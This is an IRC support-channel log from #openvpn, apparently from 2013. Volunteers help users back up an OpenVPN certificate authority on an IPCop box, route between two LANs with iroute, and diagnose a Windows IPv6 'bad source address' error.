01:58 < csaba> It is in a highschool where about 60 teachers have vpn keys so I do not want to recreate them.
01:58 <+pekster> csaba: Just copy them over; the keys and certs are just files (unless you're doing something with hardware devices, like smartcards. That's rare on a server.)
01:59 < csaba> same question, what happens if I have to change the ethernet card?
01:59 <+pekster> If you kept your PKI on that same host, back up that entire PKI directory (you should be doing that anyway in case the system has a problem and you need to recover, otherwise you'll have to start a new PKI)
02:00 <+pekster> If you have to change the Ethernet card? OpenVPN doesn't care about your network hardware so long as it has network access
02:00 < csaba> ok, I thought it creates some kind of link to that specific eth card for security reasons
02:00 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has joined #openvpn
02:01 <+pekster> Nope. The security is based on TLS using an X.509 PKI model
02:01 < csaba> but if it is that simple, that is cool
02:01 <+pekster> If you have a deployment like that with 60 remote field users, you should really consider your backup and disaster-recovery procedures too
02:02 <+pekster> (primarily applies to your PKI, since worst-case you could always generate a new server certificate. It really sucks to have to re-do a deployed PKI because your CA box exploded and you don't have backups)
02:03 < csaba> right now I have raid mirror and that is it
02:03 <+pekster> Just remember, you can't issue new certificates without your PKI files (easy-rsa, or whatever other frontend you might use to generate the certs)
02:04 < csaba> thanks, I need to find them then
02:05 < csaba> I think it is safe to just backup the entire openvpn dir
02:05 <@krzee> the ethernet card question assumes you're not in bridge mode
02:05 <+pekster> Yup. Some people keep them on the VPN server out of convenience, but it's bad practice to keep the CA files on the VPN server itself. Some smaller deployments may not care about best practices (a home VPN server, for example, might not need to split things like that)
02:06 <+pekster> With respect to the key/cert files it's not related to the card krzee
02:06 < csaba> do you have any experience with ipcop?
02:06 <+pekster> configs perhaps if the IP changes on the server in a bridge setup, but not the PKI
02:06 <+pekster> I have no experience with it
02:06 <@krzee> right
02:07 < csaba> I do not happen to find the pki files
02:07 <+pekster> Where'd you generate the PKI?
02:07 < csaba> I have .p12 and .pem files
02:08 < csaba> for the users
02:08 <+pekster> You're going to be very unhappy if you reformat that box and the CA was stored on there and you don't have backups
02:08 <+pekster> Step 1: find it. Step 2: do backups. Step 3: understand the importance of proper management of your security-centric infrastructure
02:09 <+pekster> ie: where is it you go to sign a new cert for a user or to re-issue an expiring one?
02:09 <@krzee> if a new teacher came, how would you make him a new cert?
02:10 < csaba> http://www.ipcop.org/2.0.0/en/admin/html/vpns-openvpn.html
02:10 <@vpnHelper> Title: 2.7.4. OpenVPN Configuration Administrative Web Page (at www.ipcop.org)
02:10 < csaba> like this
02:10 <@krzee> you better be careful before you format
02:10 < csaba> right now I was looking for the files over ssh on the server
02:10 <@krzee> you need to get the pki out
02:11 < csaba> wonder why do I need the pki when this setup does not have any?
02:12 < csaba> I think it is using a different method
02:12 < csaba> but I know little about this
02:12 < csaba> it was pretty easy to set openvpn up with ipcop
02:13 <@krzee> do you give your users files or passwords?
02:13 < csaba> well, both
02:13 < csaba> I generate a new user then also a password
02:14 <@krzee> i see
02:14 < csaba> and they change that later with openvpngui
02:14 <@krzee> oh ok
02:14 <@krzee> that is a passphrase on their cert
02:14 <@krzee> same as doing:
02:14 < csaba> so now when I see the files over ssh these are pem and p12 files
02:14 <@krzee> !factoids search cert
02:14 <@vpnHelper> 'servercert', 'certs', 'nocert', 'certverify', 'certinfo', 'cert_chains', and 'certfight'
02:14 <@krzee> !factoids search pass
02:14 <@vpnHelper> 'winpass', '2.1-winpass-script', 'authpass', 'password-only', 'strip-passphrase', 'change-passphrase', 'enable-passwd-save', and 'password'
02:15 <@krzee> !change-passphrase
02:15 <@vpnHelper> "change-passphrase" is see http://openvpn.net/archive/openvpn-users/2005-03/msg00230.html for how to change (or add) a key's passphrase
02:15 <@krzee> that's what the change password feature of openvpngui does
02:15 <@krzee> which means they are using pki
02:15 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Ping timeout: 255 seconds]
02:15 < csaba> let me verify then, if I backup the openvpn dir is that enough?
02:16 <@krzee> if i were you i would NOT format that box
02:16 <@krzee> i would get another one running how i want it
02:16 < csaba> if let's say I need to build a new one then copy openvpn over and be fine?
02:16 <@krzee> then you could format
02:16 <@krzee> no way for me to know
02:16 <@krzee> you're asking a ipcop question
02:16 <+pekster> csaba: Backing up the openvpn dir will NOT be enough UNLESS your entire CA PKI structure is in that directory (if it is, then you might be fine)
02:16 < csaba> oh of course I do not want to format
02:16 <@krzee> ^
02:16 <+pekster> No one here can tell you where your PKI files are ;)
02:17 <+pekster> You should know this (you need to go there every time you sign a cert, so you should know how to find it yourself, hopefully)
02:17 <@krzee> he uses a web gui
02:17 <@krzee> this is why i hate web guis, it leads people to not know what they're really doing
02:17 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 252 seconds]
02:18 < csaba> I think like I said this one uses pem and p12 files, and somehow they hold that PKI you guys talk about
02:19 <+pekster> No, those are just the files issued to the server
02:19 < csaba> hm, ok
02:19 <+pekster> There's an entire PKI with your CA private key, about a dozen helper files that contain your entire certificate database, and every issued certificate you've ever processed
02:20 <+pekster> And if you fail to save it properly, you will never be able to issue another certificate, and will have to start which will void all the stuff you've issued. I'd strongly suggest you learn what PKI management is so you can do these steps yourself, otherwise you are risking this all happening anyway from a simple disk or filesystem failure
02:21 < csaba> yes, true and that is exactly what I am after
02:21 < csaba> thanks so far for taking your time with me
02:21 <@krzee> whatever you do, do not delete this system until after you have another server up and issuing working certs
02:22 < csaba> ok, thanks
02:22 < csaba> and all I wanted to know if openvpn was connected to the hw or not
02:22 < csaba> so good news is that it is not
02:23 <@krzee> openvpn is only dependent on the hw if you're in bridge mode
02:24 < csaba> do those PKI files have a .pki ending?
02:24 <+pekster> No. They're technically extension-independent, but usually contain a variety of .key, .crt (or .cert) and .csr (or .req) files
02:24 <+pekster> You could call them secret.jpg if you wanted; the system doesn't care
02:27 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn
02:27 < csaba> ok, interestingly I have these dirs: ca, ccd, certs, crls openssl but only certs have files in them
02:28 < csaba> the mentioned pem and p12 files for users
02:30 <@krzee> where are those dirs?
02:31 -!- brute11k [~brute11k@89.249.235.75] has joined #openvpn
02:31 < csaba> /var/ipcop/openvpn
02:35 < csaba> the pki is the root host cert?
02:35 < csaba> I think as I remember this root host cert was the first I had to create
02:35 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Quit: Ex-Chat]
02:36 < csaba> for root I can download a cacert.pem and for host a hostcert.pem
02:37 < csaba> like this: http://www.ipcop.org/2.0.0/en/admin/html/vpns-ca.html
02:37 <@vpnHelper> Title: 2.7.5.Certificate Authorities Administrative Web Page (at www.ipcop.org)
02:39 <+pekster> You need to save the entire PKI structure. Not just the certs, and not just the keys. The entire PKI structure needs to be moved over if it's on that system. You'll have to check with the documentation of whatever frontend you're using, because I have no clue how it's designed or where the files are stored or what format they're in
02:41 < csaba> ok, sorry guys and thanks for your patience
02:41 <+pekster> It sounds like this *might* be stored under /var/ipcop/openvpn, but I can't really be sure without seeing the setup
02:42 < csaba> ok, that is what I am guessing too, just weird that I do not find any pki
02:43 <+pekster> .pem is a common extension for holding any of the data types (PEM and DER are the 2 most common encodings of X509 data, along with the p12 container format)
02:43 <+pekster> Again, the extension is just convention and you could call them .blah if you wanted
02:46 -!- ade_b [~Ade@95.209.17.187.bredband.tre.se] has joined #openvpn
02:46 -!- ade_b [~Ade@95.209.17.187.bredband.tre.se] has quit [Changing host]
02:46 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
02:58 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 276 seconds]
03:06 -!- wrod [~wrodrigue@110.235.82.2] has joined #openvpn
03:21 < IT> hello
03:22 < IT> how can i link together 2 LAN's, with machines being able to ping each other via routing? what am i missing from this config http://pastebin.com/2AGRFSuK ?
03:23 -!- brute11k [~brute11k@89.249.235.75] has quit [Ping timeout: 240 seconds]
03:31 -!- Devastator- [~devas@177.18.197.67] has quit [Changing host]
03:31 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn
03:31 -!- Devastator- is now known as Devastator
03:31 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn
03:31 <+pekster> IT: At the very least an iroute since you've commented out the client-config-dir parameter that's required to support it. This is listed on the guide/flowchart:
03:31 <+pekster> !clientlan
03:31 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route
03:31 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png
03:32 < IT> ty
03:32 < IT> !route_outside_openvpn
03:32 <@vpnHelper> "route_outside_openvpn" is (#1) If your server is not the default gateway for the LAN, you will need to add routes to your gateway. See ROUTES TO ADD OUTSIDE OPENVPN in !route or (#2) Here are 2 diagrams that explain how this works: http://www.secure-computing.net/wiki/index.php/Graph http://i.imgur.com/BM9r1.png
03:32 <+pekster> IT: Separate from that, you also need to follow the 2nd flowchart to fully support the LAN behind the server. You need both steps done fully and correctly in order to get bidirectional communication. The server-side LAN is described here:
03:32 <+pekster> !serverlan
03:32 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png
03:33 <+pekster> IT: remember, pick just one to fully work on at a time before moving to the next as they're both required
03:33 < IT> damn
03:36 -!- kyrix [~ashley@71-212-76-89.tukw.qwest.net] has quit [Quit: Ex-Chat]
03:40 -!- ronsel [~ronsel@dslb-088-074-167-187.pools.arcor-ip.net] has joined #openvpn
03:42 <@krzee> be sure you read and understand this:
03:42 <@krzee> !route
03:42 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide
03:43 <@krzee> looks like you're missing an iroute
03:43 <+pekster> Yea, I noted that too but linked both docs in case there's more missing too
03:43 <@krzee> yep
03:44 < IT> already added that in ccd "iroute 192.168.1.0 255.255.255.0"
03:44 <@krzee> you uncommented ccd in the server config too right
03:44 < IT> yeap
03:44 <@krzee> then continue with the flowcharts
03:44 < IT> that was there for debugging
03:45 <+pekster> You've also reversed your networks at some point
03:45 < IT> already reviewed them, there's something related to routing
03:45 <@krzee> IT, huh?
03:45 <@krzee> nowhere in my flowcharts does it say "there's something related to routing"
03:51 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn
03:53 < fu_fu> can anyone tell me what this means? Tue Jan 08 03:21:19 2013 us=821375 ja/82.x.x.x:x1694 MULTI: bad source address from client [fe80::f88e:1c69:4d17:bf5], packet dropped how do I translate that address? the client addr is actually 192.168.1.5; last time i put iroute for that it brought the whole system down
03:56 <+pekster> fu_fu: Evidently your client is sourcing IPv6 data across the VPN from an address the server doesn't recognize. I'm guessing that's a Windows client? I've seen them frequently get confused when multiple local addresses are available to source packets from due to poor multihoming abilities of the platform
03:56 <+pekster> There's nothing you can do really, besides fix whatever bad application on the client's end is doing something that silly
03:59 < fu_fu> hard to diagnose a remote client, is there a decoder for the source number? fe80::f88e:1c69:4d17:bf5]
04:00 <+pekster> The "decoder" you want is known as IANA which manages IPv6 (and IPv4) allocations
04:00 <@plaisthos> fu_fu: fe80 is link local
04:00 <+pekster> http://www.iana.org/assignments/ipv6-address-space/ipv6-address-space.xml
04:00 <@vpnHelper> Title: Internet Protocol Version 6 Address Space (at www.iana.org)
04:00 < fu_fu> right on, thanks again
04:00 <+pekster> OpenVPN should never be assigning that address to the TAP adapter for the VPN interface, so Windows has made a mistake and is sourcing traffic poorly
04:01 <+pekster> I've seen it do that on completely IPv4 networks too with its LAN IP, so it's just bad OS design
04:01 <+pekster> It's not a problem as OpenVPN drops such badly sourced packets (you can ignore the error, unless it's a sign of a broken application you need to debug from the client side)
04:03 < fu_fu> the broken app is Remote Desktop I think, but could be the user is using IPv6 autoassign, and these are just regular bcasts, right
04:04 <@krzee> bcasts over ipv4?
04:04 <+pekster> It has no route across the VPN adapter for such packets unless you've specifically set up IPv6 support. So no, it's just Windows screwing things up
04:05 <+pekster> Also save to ignore
04:05 <+pekster> safe*
04:06 -!- dazo_afk is now known as dazo
04:07 < fu_fu> i had the server close socket 3 times in the past four hours, and it coincides with this err message, i thought it related
04:09 <+pekster> That's an error dealing with encapsulated addressing within your tunnel. I hope you don't mean OpenVPN is getting disconnected as a result
04:11 < fu_fu> i will up the logging factor, best to find out, than suppose
04:16 -!- brute11k [~brute11k@89.249.235.33] has joined #openvpn
04:17 < fu_fu> need to get some sleep, take care all
04:18 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Quit: Leaving.]
04:33 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
04:34 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 240 seconds]
04:44 <@dazo> pekster: if you see people here having the "MULTI: bad source address" issue ... this might be a good pointer: http://openvpn.net/index.php/open-source/faq/79-client/317-qmulti-bad-source-address-from-client--packet-droppedq-or-qget-inst-by-virt-failedq.html
04:44 <@vpnHelper> Title: "MULTI: bad source address from client , packet dropped" or "GET INST BY VIRT: [failed]"? (at openvpn.net)
05:04 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 252 seconds]
05:06 -!- Eagleman [~Eagleman@D4B2D271.static.ziggozakelijk.nl] has joined #openvpn
05:06 < Eagleman> How much speedloss in MB's will there be on an 60MB connection with 256bit encryption?
05:16 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn
05:25 -!- wrod [~wrodrigue@110.235.82.2] has quit [Remote host closed the connection]
05:28 < kisom> Eagleman: How fast does my car go if I push it to the max?
05:36 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
05:36 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
05:36 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
05:36 -!- mode/#openvpn [+o krzee] by ChanServ
05:42 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 276 seconds]
05:43 < pppingme> Eagleman It's a legit question, but I don't know the answer, encryption will add some overhead, so there will be more data obviously, but I don't know the numbers
05:44 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn
05:45 < pppingme> Eagleman on the plus side, openvpn does support compression, which doesn't happen over a typical connection, so it may be a wash, or even to your advantage, depending on the type of data.
05:47 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn
05:48 -!- Carbon_Monoxide [~cmonxide@058176022144.ctinets.com] has joined #openvpn
05:49 -!- Carbon_Monoxide [~cmonxide@058176022144.ctinets.com] has quit [Read error: Connection reset by peer]
05:53 -!- thermoman [~thermoman@idle.foobar0815.de] has joined #openvpn
05:53 < thermoman> is it possible to use cidr notation for push route?
05:53 < thermoman> e.g. push "route 1.2.3.4/24"
05:53 < thermoman> instead of
05:53 < thermoman> e.g. push "route 1.2.3.4 netmask 255.255.255.0"
05:53 <@plaisthos> thermoman: no
05:53 < thermoman> the netmask version is ugly to read
05:53 < thermoman> :(
05:54 <@plaisthos> thermoman: you can create a patch if you want :)
05:54 * thermoman submits a feature request
05:54 < thermoman> :)
05:54 <@krzee> you read your routes often?
05:54 <@krzee> your vpn configs?
05:55 <@krzee> i configure my stuff, and then it works
05:55 <@krzee> if your desktop background picture is your vpn config, i understand
05:55 <@plaisthos> not even some professional equipment does support cidr for route syntax ;)
06:00 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 256 seconds]
06:17 <@krzee> !ping
06:17 <@vpnHelper> pong
06:20 <@plaisthos> lol
06:25 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer]
06:32 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 240 seconds]
06:37 -!- niervol [~krystian@193.106.244.150] has joined #openvpn
06:43 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
06:47 -!- ade_b [~Ade@redhat/adeb] has quit [Client Quit]
06:56 -!- ade_b [~Ade@95.209.17.187.bredband.tre.se] has joined #openvpn
06:56 -!- ade_b [~Ade@95.209.17.187.bredband.tre.se] has quit [Changing host]
06:56 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
06:59 -!- `Ile` [~kvirc@212-200-214-138.dynamic.isp.telekom.rs] has joined #openvpn
07:22 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 260 seconds]
07:22 -!- GabrieleV_ [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn
07:25 -!- Carbon_Monoxide [~cmonxide@n219078079066.netvigator.com] has joined #openvpn
07:27 -!- Carbon_Monoxide [~cmonxide@n219078079066.netvigator.com] has left #openvpn []
07:30 -!- GabrieleV_ is now known as GabrieleV
07:35 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.]
07:36 -!- niervol [~krystian@193.106.244.150] has joined #openvpn
07:39 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn
07:46 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Read error: Connection reset by peer]
07:46 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn
08:14 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 252 seconds]
08:16 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has joined #openvpn
08:27 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
08:38 -!- brute11k1 [~brute11k@89.249.235.33] has joined #openvpn
08:39 -!- brute11k [~brute11k@89.249.235.33] has quit [Ping timeout: 265 seconds]
08:49 -!- brute11k [~brute11k@89.249.235.33] has joined #openvpn
08:50 -!- brute11k1 [~brute11k@89.249.235.33] has quit [Ping timeout: 260 seconds]
08:59 -!- MarKsaitis_ [~MarKsaiti@81.101.81.114] has joined #openvpn
09:00 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Ping timeout: 255 seconds]
09:01 -!- MarKsaitis_ [~MarKsaiti@81.101.81.114] has quit [Read error: Connection reset by peer]
09:01 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn
09:01 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.]
09:10 <@ecrist> IT: no PMs, please
09:10 <+rob0> oh, sorry, that's partly my fault
09:11 <@ecrist> hrm
09:11 * ecrist goes and reads
09:11 <+rob0> Here's the deal: IT wants to hire someone to do a small and simple VPN job.
09:11 < IT> oh, k :P
09:11 <+rob0> I could have done it, but not through TeamViewer, which is the way he wants to provide access.
09:12 <@ecrist> wtf is TeamViewer?
09:12 -!- abradsha [~Ade@95.209.134.79.bredband.tre.se] has joined #openvpn
09:12 <@ecrist> ah
09:13 <@ecrist> nm, I can google
09:13 <@ecrist> IT, you're forgiven your PM.:)
09:13 < Eagleman> whats bad about teamviewer lol
09:13 <+rob0> If you have TeamViewer you'll be in and out in less than an hour. He just wants a site-to-site VPN which is partly working already.
09:14 <+rob0> well, I'm not saying what's good nor bad about TeamViewer; I don't have it and can't easily install it. But I am a fan of ssh :)
09:15 < Eagleman> I guess he wants to monitor what you are doing
09:15 <+rob0> screen(1) can do that too
09:15 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 248 seconds]
09:18 < IT> !1918
09:18 <@vpnHelper> "1918" is (#1) RFC1918 makes three unique netblocks available for private use: 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 or (#2) see also: http://en.wikipedia.org/wiki/Private_network or http://www.faqs.org/rfcs/rfc1918.html or (#3) Too lazy to find your own subnet? Try this one: http://scarydevilmonastery.net/subnet.cgi
09:18 <@ecrist> so can watch(8)
09:19 < IT> !8
09:23 <@ecrist> IT, I'd strongly suggest you first switch your IP subnets. If you decide to ever add clients, it'll make your life easier before you entrench yourself in those ranges
09:24 <@ecrist> that's up to you, though. we can still get things working with what you have
09:25 < IT> i changed one to 192.168.1.x a few weeks ago
09:25 < IT> i know it's a little harder to track this way, but it's easier for the users
09:25 <@ecrist> 99% of all home gateways use either 192.168.0.0/24 or 192.168.1.0/24 as their range
09:26 <@ecrist> which will cause problems if anyone ever connects in from a home network that uses those ranges.
09:26 < IT> the 2 branches are in a closed environment, nobody should connect from home
09:27 <+rob0> yep, I mentioned that yesterday also. It CAN be done with those networks, but in the long run (when something WILL need to change), I predict pain. :)
09:27 < IT> one step at a time :P
09:27 <@ecrist> sure
09:27 <@ecrist> what do you have for the server config now?
09:28 <@ecrist> and what do you have for the client config now?
09:28 <@ecrist> also, are the two VPN machines your network gateways already, or are they secondary boxes?
09:28 <+rob0> We got very close yesterday. Seemed like iroute wasn't working.
09:28 < IT> they are my gateways, pasting the config in a sec
09:28 <+rob0> yes, they're both the gateways
09:29 <+rob0> The ccd file was being read, but for some reason iroute was not working.
09:29 < IT> http://pastebin.com/WnX2r34i
09:30 <@ecrist> in your paste, there's a typo, the network ranges on lines 23 and 24 should match
09:31 -!- abradsha is now known as ade_b
09:31 -!- ade_b [~Ade@95.209.134.79.bredband.tre.se] has quit [Changing host]
09:31 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
09:32 < IT> they should contain the local ip or the client's ip?
09:32 <+rob0> 192.168.0.0/24 is the client LAN, 192.168.1.0/24 is the server LAN
09:33 <+rob0> push the server LAN route to the client, set the client LAN route on the server?
09:35 -!- dazo changed the topic of #openvpn to: OpenVPN Community Support Channel || PLEASE read entire topic || OpenVPN RELEASED FOR ANDROID! || Current Release: 2.3.0 (08-Jan-2013) || First time? Use !welcome and !goal || Access-Server? /join #openvpn-as || We're not psychic - please !paste your !configs and !logs and a description of the issue || Your problem is probably your firewall, Really ||Not a native English speaker? say so!
09:36 <@ecrist> IT: they should contain the local subnet for the server
09:36 < IT> ok, changed both to 192.168.1.0
09:37 < IT> the ccd contains iroute 192.168.1.0 255.255.255.0
09:45 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Ping timeout: 246 seconds]
09:50 < IT> @ecrist?
09:53 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn
09:54 <@ecrist> sorry, was AFK
09:54 * ecrist reads
09:55 <@ecrist> the iroute is wrong
09:55 <@ecrist> the iroute should be for the route of the client LAN
09:55 < IT> 192.168.0.0 255.255.255.0 then
09:56 < IT> ok, changed
09:57 -!- gladiatr [~sdspence@24.124.15.166] has joined #openvpn
09:57 -!- gladiatr [~sdspence@24.124.15.166] has quit [Changing host]
09:57 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn
09:57 < IT> i can ping machines in LAN1 from LAN2 gw but not vice-versa
09:58 <@ecrist> IT, can you draw up a diagram, quick?
09:58 <@ecrist> !diagram
09:58 <@vpnHelper> "diagram" is You can use a site such as http://gliffy.com to create a network diagram as well as programs such as Visio, Dia, or OmniGraffle
09:58 < IT> sure
10:05 -!- Eagleman [~Eagleman@D4B2D271.static.ziggozakelijk.nl] has quit []
10:06 < IT> just a quick drawing http://www.gliffy.com/go/publish/4209220/ tell me if i missed anything important
10:06 <@vpnHelper> Title: Gliffy Public Diagram - network diagram1 (at www.gliffy.com)
10:08 -!- ben1066_ is now known as ben1066
10:09 <@ecrist> perfect
10:09 <@ecrist> which side are you calling LAN1 and LAN2?
10:09 < IT> left LAN1, right LAN2
10:10 <@ecrist> ok
10:11 <@ecrist> is ipforwarding enabled on the client and the server?
10:11 < IT> i believe so, they server as internet gateways
10:12 < IT> *serve
10:13 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Quit: Leaving]
10:14 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
10:15 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Killed (idoru (Spam is off topic on freenode.))]
10:16 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn
10:16 < fu_fu> what's up dudes
10:16 < fu_fu> and dudettes
10:17 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
10:17 < fu_fu> I wanted to tell you about a problem I found a solution for today. There is no documentation of it that I can find so far, so I am letting you all know.
10:18 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt]
10:19 < fu_fu> the log error msg is regarding MULTI: bad source address from client [fe80::d978:2f77:f0f3:3320], packet dropped
10:20 <@ecrist> IT: firewall rules?
10:20 < fu_fu> this is a windows client to windows server, IPv6 issue is easily fixed by removing IPv6 from the TAP adapter
10:20 <@ecrist> also,
10:20 <@ecrist> !logs
10:20 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it and select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile
10:21 < fu_fu> RTue Jan 08 11:09:37 2013 us=991671 cor-to-EUTS01/174.129.219.194:61210 MULTI: bad source address from client [fe80::d978:2f77:f0f3:3320], packet dropped
10:21 -!- master_of_master [~master_of@p57B55F0A.dip.t-dialin.net] has quit [Ping timeout: 255 seconds]
10:22 <@ecrist> the logs was for IT
10:22 < fu_fu> right sorry
10:22 < fu_fu> i'm just stoked i got the err off my screen
10:22 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn
10:23 -!- master_of_master [~master_of@p57B53BBC.dip.t-dialin.net] has joined #openvpn
10:23 <+rob0> "Bad source address from client" is in the OpenVPN FAQ, and the answer is iroute.
10:27 < fu_fu> rob0 I think, it is an IPv6 issue with windows the iroute statements are correct but the error still occurs, when i disabled IPv6 on the adapter the error stopped.
10:28 <+rob0> Since IPv6 is only in 2.3, and 2.3 has not yet been released, documentation details might not be complete.
10:28 < fu_fu> pekster ID'd the error as an IPv6 problem in windows I think, several hours ago. I just wanted to close the loop
10:28 < fu_fu> rob0 2.3 is out now :)
10:28 <@ecrist> IT???
10:29 < IT> pasting
10:29 <@ecrist> rob0: 2.3 was released today
10:29 < IT> got lag on pastebin, 2 sec, check pm
10:29 <@ecrist> see /topic
10:30 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds]
10:31 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via]
10:31 < IT> got the rules?
10:31 <+rob0> oh ha. I saw dazo change the /topic but didn't pay attention to it :)
10:32 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 248 seconds]
10:34 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn
10:34 <@ecrist> looking
10:34 <@ecrist> rob0: probably good to pay attention to
10:35 <@ecrist> !iptables
10:35 <@vpnHelper> "iptables" is (#1) to test if iptables is your problem, disable all rules or put the defaults to accept: iptables -P INPUT ACCEPT; iptables -P OUTPUT ACCEPT; iptables -P FORWARD ACCEPT; iptables -F; iptables -Z or (#2) please see http://openvpn.net/man#lbBD for more info or (#3) you can see http://www.secure-computing.net/wiki/index.php/OpenVPN/Firewall for pf or iptables or (#4) These are just the
10:35 <@vpnHelper> basics to get OpenVPN working. Proper firewall design is beyond the scope of this channel. You can try #iptables
10:35 <@ecrist> IT ^^^
10:36 -!- b00b [~freenode@46.166.178.155] has joined #openvpn
10:39 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 260 seconds]
10:39 < IT> i don't think it's the firewall, i got the policy on default accept and can't ping from lan1 to lan2
10:40 < IT> i don't think it's the firewall, i got the policy on default accept and can't ping from lan1 to lan2 gw
10:40 < IT> sry for double post
10:42 <@ecrist> so, you can ping from lan2 machines to lan1 machines?
10:42 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn
10:43 <@ecrist> can you ping from lan1 machines to lan2 machines?
10:44 < IT> no and no
10:44 < IT> i can ping from lan2 gw to lan1 machines
10:44 < IT> and that's it
10:44 <@ecrist> you still haven't posted your logs
10:45 <@ecrist> also, can you post a traceroute from a lan1 machine to a lan2 machine?
10:45 <@ecrist> and your routing tables from both lan1 gw and lan2 gw
10:47 < IT> here you go http://pastebin.com/fnCL33ua
10:49 -!- kjs [kjs@fedora/kjs] has joined #openvpn
10:50 < kjs> Guys is there any way of seeing a list of when users have authenticated?
10:50 <@ecrist> look at the openvpn status log
10:50 <@ecrist> IT: logs?
10:51 <@ecrist> also, !configs again, please
10:51 < kjs> i am looking in the status log now...
10:51 < IT> ServerA -> http://pastebin.com/XERBh8m9
10:52 < IT> ServerB -> http://pastebin.com/ef7t8veb
10:53 < IT> Configs -> http://pastebin.com/m64DhN0h
10:56 < IT> i have to move to my home workstation :) afk a little
11:00 <@ecrist> kk
11:02 < kjs> hmm
11:02 < kjs> openvpn-status-log only contains connections with todays date ?
11:02 < kjs> does it only log for 1 day?
11:03 <@ecrist> kjs: openvpn-status-log shows currently connected users
11:03 <@ecrist> !man
11:03 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend!
